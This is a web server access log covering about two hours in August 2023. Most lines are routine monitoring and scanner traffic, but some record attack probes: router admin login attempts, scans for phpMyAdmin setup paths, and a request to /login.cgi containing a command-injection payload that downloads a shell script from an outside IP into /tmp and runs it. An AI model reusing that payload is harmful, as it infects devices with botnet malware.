212.91.246.72 - - [06/Aug/2023:22:53:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:22:54:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:22:55:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:22:56:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:22:57:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
190.96.1.233 - - [06/Aug/2023:22:57:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
212.91.246.72 - - [06/Aug/2023:22:58:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:22:59:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:23:00:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:23:01:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
194.165.16.10 - - [06/Aug/2023:23:02:12 +0200] "\x03" 501 316 "-" "-"
212.91.246.72 - - [06/Aug/2023:23:02:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:23:03:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:23:04:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:23:05:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:23:06:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:23:07:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:23:08:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:23:09:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:23:10:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:23:11:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:23:12:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.88.90.145 - - [06/Aug/2023:23:12:55 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.85:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.91.246.72 - - [06/Aug/2023:23:13:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
198.235.24.231 - - [06/Aug/2023:23:13:54 +0200] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
212.91.246.72 - - [06/Aug/2023:23:14:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:23:15:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:23:16:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:23:17:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:23:18:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:23:19:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:23:20:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
47.252.6.106 - - [06/Aug/2023:23:21:03 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
212.91.246.72 - - [06/Aug/2023:23:21:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
5.42.95.168 - - [06/Aug/2023:23:22:14 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.85:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.91.246.72 - - [06/Aug/2023:23:22:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
47.252.6.106 - - [06/Aug/2023:23:23:36 +0200] "GET /1691357016 HTTP/1.1" 404 315 "-" "Mozilla/5.0"
47.252.6.106 - - [06/Aug/2023:23:23:36 +0200] "POST /sdk HTTP/1.1" 404 308 "-" "Mozilla/5.0"
47.252.6.106 - - [06/Aug/2023:23:23:37 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
47.252.6.106 - - [06/Aug/2023:23:23:37 +0200] "GET /HNAP1 HTTP/1.1" 404 310 "-" "Mozilla/5.0"
47.252.6.106 - - [06/Aug/2023:23:23:37 +0200] "GET /evox/about HTTP/1.1" 404 315 "-" "Mozilla/5.0"
47.252.6.106 - - [06/Aug/2023:23:23:46 +0200] "\x16\x03\x01\x02" 501 319 "-" "-"
47.252.6.106 - - [06/Aug/2023:23:23:51 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
212.91.246.72 - - [06/Aug/2023:23:23:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
47.252.6.106 - - [06/Aug/2023:23:23:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
47.252.6.106 - - [06/Aug/2023:23:23:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
47.252.6.106 - - [06/Aug/2023:23:23:53 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "curl/7.75.0"
47.252.6.106 - - [06/Aug/2023:23:23:53 +0200] "GET /robots.txt HTTP/1.1" 404 315 "-" "curl/7.75.0"
212.91.246.72 - - [06/Aug/2023:23:24:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:23:25:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:23:26:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
59.24.45.11 - - [06/Aug/2023:23:27:23 +0200] "GET /boaform/admin/formLogin?username=ec8&psd=ec8 HTTP/1.0" 404 324 "-" "-"
212.91.246.72 - - [06/Aug/2023:23:27:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:23:28:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
5.44.42.25 - - [06/Aug/2023:23:29:51 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.84:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.91.246.72 - - [06/Aug/2023:23:29:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:23:30:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:23:31:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:23:32:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:23:33:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:23:34:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:23:35:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:23:36:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:23:37:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:23:38:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
5.42.87.155 - - [06/Aug/2023:23:39:03 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.85:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.91.246.72 - - [06/Aug/2023:23:39:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
80.66.88.211 - - [06/Aug/2023:23:39:59 +0200] "\x03" 501 316 "-" "-"
212.91.246.72 - - [06/Aug/2023:23:40:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:23:41:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:23:42:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:23:43:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
52.167.144.38 - - [06/Aug/2023:23:44:24 +0200] "GET /sitemaps.xml HTTP/1.1" 404 317 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36"
212.91.246.72 - - [06/Aug/2023:23:44:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:23:45:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
205.210.31.240 - - [06/Aug/2023:23:46:19 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [06/Aug/2023:23:46:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
47.243.111.114 - - [06/Aug/2023:23:46:54 +0200] "GET http://212.91.246.82:80/phpMyAdmin/scripts/setup.php HTTP/1.0" 404 333 "-" "-"
47.243.111.114 - - [06/Aug/2023:23:46:55 +0200] "GET http://212.91.246.82:80/phpmyadmin/scripts/setup.php HTTP/1.0" 404 333 "-" "-"
47.243.111.114 - - [06/Aug/2023:23:46:55 +0200] "GET http://212.91.246.82:80/phpMyAdmin-2.11.4/scripts/setup.php HTTP/1.0" 404 340 "-" "-"
47.243.111.114 - - [06/Aug/2023:23:46:56 +0200] "GET http://212.91.246.82:80/phpMyAdmin-2.11.3/scripts/setup.php HTTP/1.0" 404 340 "-" "-"
47.243.111.114 - - [06/Aug/2023:23:46:56 +0200] "GET http://212.91.246.82:80/phpMyAdmin-2.10.0.2/scripts/setup.php HTTP/1.0" 404 342 "-" "-"
47.243.111.114 - - [06/Aug/2023:23:46:57 +0200] "GET http://212.91.246.82:80/phpMyAdmin-2.10.3/scripts/setup.php HTTP/1.0" 404 340 "-" "-"
47.243.111.114 - - [06/Aug/2023:23:46:58 +0200] "GET http://212.91.246.82:80/phpMyAdmin-2.8.0.2/scripts/setup.php HTTP/1.0" 404 341 "-" "-"
47.243.111.114 - - [06/Aug/2023:23:46:58 +0200] "GET http://212.91.246.82:80/phpMyAdmin-2.10.2/scripts/setup.php HTTP/1.0" 404 340 "-" "-"
47.243.111.114 - - [06/Aug/2023:23:46:59 +0200] "GET http://212.91.246.82:80/phpMyAdmin-2.11.9.2/scripts/setup.php HTTP/1.0" 404 342 "-" "-"
47.243.111.114 - - [06/Aug/2023:23:47:00 +0200] "GET http://212.91.246.82:80/phpMyAdmin-2.11.0/scripts/setup.php HTTP/1.0" 404 340 "-" "-"
47.243.111.114 - - [06/Aug/2023:23:47:00 +0200] "GET http://212.91.246.82:80/phpMyAdmin-2.11.7/scripts/setup.php HTTP/1.0" 404 340 "-" "-"
47.243.111.114 - - [06/Aug/2023:23:47:01 +0200] "GET http://212.91.246.82:80/phpMyAdmin-2.11.1.2/scripts/setup.php HTTP/1.0" 404 342 "-" "-"
47.243.111.114 - - [06/Aug/2023:23:47:02 +0200] "GET http://212.91.246.82:80/pma/scripts/setup.php HTTP/1.0" 404 326 "-" "-"
47.243.111.114 - - [06/Aug/2023:23:47:02 +0200] "GET http://212.91.246.82:80/phpMyAdmin3/scripts/setup.php HTTP/1.0" 404 334 "-" "-"
47.243.111.114 - - [06/Aug/2023:23:47:03 +0200] "GET http://212.91.246.82:80/myadmin/scripts/setup.php HTTP/1.0" 404 330 "-" "-"
47.243.111.114 - - [06/Aug/2023:23:47:03 +0200] "GET http://212.91.246.82:80/MyAdmin/scripts/setup.php HTTP/1.0" 404 330 "-" "-"
47.243.111.114 - - [06/Aug/2023:23:47:04 +0200] "GET http://212.91.246.82:80/PHPMYADMIN/scripts/setup.php HTTP/1.0" 404 333 "-" "-"
47.243.111.114 - - [06/Aug/2023:23:47:05 +0200] "GET http://212.91.246.82:80/mysqladmin/scripts/setup.php HTTP/1.0" 404 333 "-" "-"
47.243.111.114 - - [06/Aug/2023:23:47:05 +0200] "GET http://212.91.246.82:80/SQL/scripts/setup.php HTTP/1.0" 404 326 "-" "-"
47.243.111.114 - - [06/Aug/2023:23:47:06 +0200] "GET http://212.91.246.82:80/phpMyAdmin-2.5.5-pl1/scripts/setup.php HTTP/1.0" 404 343 "-" "-"
47.243.111.114 - - [06/Aug/2023:23:47:07 +0200] "GET http://212.91.246.82:80/phpMyAdmin-2.5.5/scripts/setup.php HTTP/1.0" 404 339 "-" "-"
47.243.111.114 - - [06/Aug/2023:23:47:07 +0200] "GET http://212.91.246.82:80/phpMyAdmin-2.5.4/scripts/setup.php HTTP/1.0" 404 339 "-" "-"
47.243.111.114 - - [06/Aug/2023:23:47:08 +0200] "GET http://212.91.246.82:80/phpMyAdmin-2.5.7-pl1/scripts/setup.php HTTP/1.0" 404 343 "-" "-"
47.243.111.114 - - [06/Aug/2023:23:47:09 +0200] "GET http://212.91.246.82:80/admin/pma/scripts/setup.php HTTP/1.0" 404 332 "-" "-"
47.243.111.114 - - [06/Aug/2023:23:47:09 +0200] "GET http://212.91.246.82:80/phpMyAdmin-2/scripts/setup.php HTTP/1.0" 404 335 "-" "-"
47.243.111.114 - - [06/Aug/2023:23:47:10 +0200] "GET http://212.91.246.82:80/web/phpMyAdmin/scripts/setup.php HTTP/1.0" 404 337 "-" "-"
47.243.111.114 - - [06/Aug/2023:23:47:10 +0200] "GET http://212.91.246.82:80/webadmin/scripts/setup.php HTTP/1.0" 404 331 "-" "-"
47.243.111.114 - - [06/Aug/2023:23:47:11 +0200] "GET http://212.91.246.82:80/admin/scripts/setup.php HTTP/1.0" 404 328 "-" "-"
47.243.111.114 - - [06/Aug/2023:23:47:12 +0200] "GET http://212.91.246.82:80/dbadmin/scripts/setup.php HTTP/1.0" 404 330 "-" "-"
47.243.111.114 - - [06/Aug/2023:23:47:12 +0200] "GET http://212.91.246.82:80/mysql/scripts/setup.php HTTP/1.0" 404 328 "-" "-"
47.243.111.114 - - [06/Aug/2023:23:47:13 +0200] "GET http://212.91.246.82:80/phpMyAdmin2/scripts/setup.php HTTP/1.0" 404 334 "-" "-"
47.243.111.114 - - [06/Aug/2023:23:47:14 +0200] "GET http://212.91.246.82:80/phpma/scripts/setup.php HTTP/1.0" 404 328 "-" "-"
47.243.111.114 - - [06/Aug/2023:23:47:14 +0200] "GET http://212.91.246.82:80/sqlweb/scripts/setup.php HTTP/1.0" 404 329 "-" "-"
47.243.111.114 - - [06/Aug/2023:23:47:15 +0200] "GET http://212.91.246.82:80/webdb/scripts/setup.php HTTP/1.0" 404 328 "-" "-"
47.243.111.114 - - [06/Aug/2023:23:47:16 +0200] "GET http://212.91.246.82:80/websql/scripts/setup.php HTTP/1.0" 404 329 "-" "-"
47.243.111.114 - - [06/Aug/2023:23:47:16 +0200] "GET http://212.91.246.82:80/_phpMyAdmin/scripts/setup.php HTTP/1.0" 404 334 "-" "-"
47.243.111.114 - - [06/Aug/2023:23:47:17 +0200] "GET http://212.91.246.82:80/php/scripts/setup.php HTTP/1.0" 404 326 "-" "-"
47.243.111.114 - - [06/Aug/2023:23:47:17 +0200] "GET http://212.91.246.82:80/admin/phpmyadmin/scripts/setup.txt HTTP/1.0" 404 339 "-" "-"
47.243.111.114 - - [06/Aug/2023:23:47:18 +0200] "GET http://212.91.246.82:80/db/scripts/setup.php HTTP/1.0" 404 325 "-" "-"
47.243.111.114 - - [06/Aug/2023:23:47:19 +0200] "GET http://212.91.246.82:80/sqlmanager/scripts/setup.php HTTP/1.0" 404 333 "-" "-"
47.243.111.114 - - [06/Aug/2023:23:47:19 +0200] "GET http://212.91.246.82:80/mysqlmanager/scripts/setup.php HTTP/1.0" 404 335 "-" "-"
47.243.111.114 - - [06/Aug/2023:23:47:20 +0200] "GET http://212.91.246.82:80/phpmanager/scripts/setup.php HTTP/1.0" 404 333 "-" "-"
47.243.111.114 - - [06/Aug/2023:23:47:21 +0200] "GET http://212.91.246.82:80/php-myadmin/scripts/setup.php HTTP/1.0" 404 334 "-" "-"
47.243.111.114 - - [06/Aug/2023:23:47:21 +0200] "GET http://212.91.246.82:80/phpmy-admin/scripts/setup.php HTTP/1.0" 404 334 "-" "-"
47.243.111.114 - - [06/Aug/2023:23:47:22 +0200] "GET http://212.91.246.82:80/mysql-admin/scripts/setup.php HTTP/1.0" 404 334 "-" "-"
5.42.87.155 - - [06/Aug/2023:23:47:31 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.81:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.91.246.72 - - [06/Aug/2023:23:47:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
167.248.133.49 - - [06/Aug/2023:23:48:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.248.133.49 - - [06/Aug/2023:23:48:19 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
167.248.133.49 - - [06/Aug/2023:23:48:20 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
212.91.246.72 - - [06/Aug/2023:23:48:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
87.236.176.101 - - [06/Aug/2023:23:49:17 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)"
45.88.90.144 - - [06/Aug/2023:23:49:52 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.84:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.91.246.72 - - [06/Aug/2023:23:49:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:23:50:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:23:51:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:23:52:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:23:53:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:23:54:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:23:55:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
20.163.46.242 - - [06/Aug/2023:23:56:04 +0200] "GET /_profiler/phpinfo HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
212.91.246.72 - - [06/Aug/2023:23:56:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:23:57:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
198.235.24.38 - - [06/Aug/2023:23:58:30 +0200] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
212.91.246.72 - - [06/Aug/2023:23:58:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:23:59:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
20.163.46.242 - - [07/Aug/2023:00:00:37 +0200] "GET /_profiler/phpinfo HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
45.88.90.144 - - [07/Aug/2023:00:06:55 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.83:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
20.29.115.150 - - [07/Aug/2023:00:20:11 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://114.67.217.170/sora.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
185.224.128.141 - - [07/Aug/2023:00:20:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
185.224.128.141 - - [07/Aug/2023:00:22:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
193.35.18.253 - - [07/Aug/2023:00:23:06 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.86:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
162.142.125.216 - - [07/Aug/2023:00:23:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
162.142.125.216 - - [07/Aug/2023:00:23:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
162.142.125.216 - - [07/Aug/2023:00:23:41 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
162.142.125.216 - - [07/Aug/2023:00:23:41 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
185.224.128.141 - - [07/Aug/2023:00:23:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
185.224.128.141 - - [07/Aug/2023:00:24:13 +0200] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
167.248.133.36 - - [07/Aug/2023:00:24:38 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.248.133.36 - - [07/Aug/2023:00:24:39 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
167.248.133.36 - - [07/Aug/2023:00:24:39 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
185.224.128.141 - - [07/Aug/2023:00:25:07 +0200] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
5.42.95.168 - - [07/Aug/2023:00:27:24 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.86:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
35.240.121.17 - - [07/Aug/2023:00:31:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.31.0"
45.88.90.144 - - [07/Aug/2023:00:40:20 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.80:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
185.224.128.141 - - [07/Aug/2023:00:45:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
45.88.90.144 - - [07/Aug/2023:00:46:40 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.85:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
35.240.121.17 - - [07/Aug/2023:00:47:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.31.0"
35.240.121.17 - - [07/Aug/2023:00:47:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.31.0"
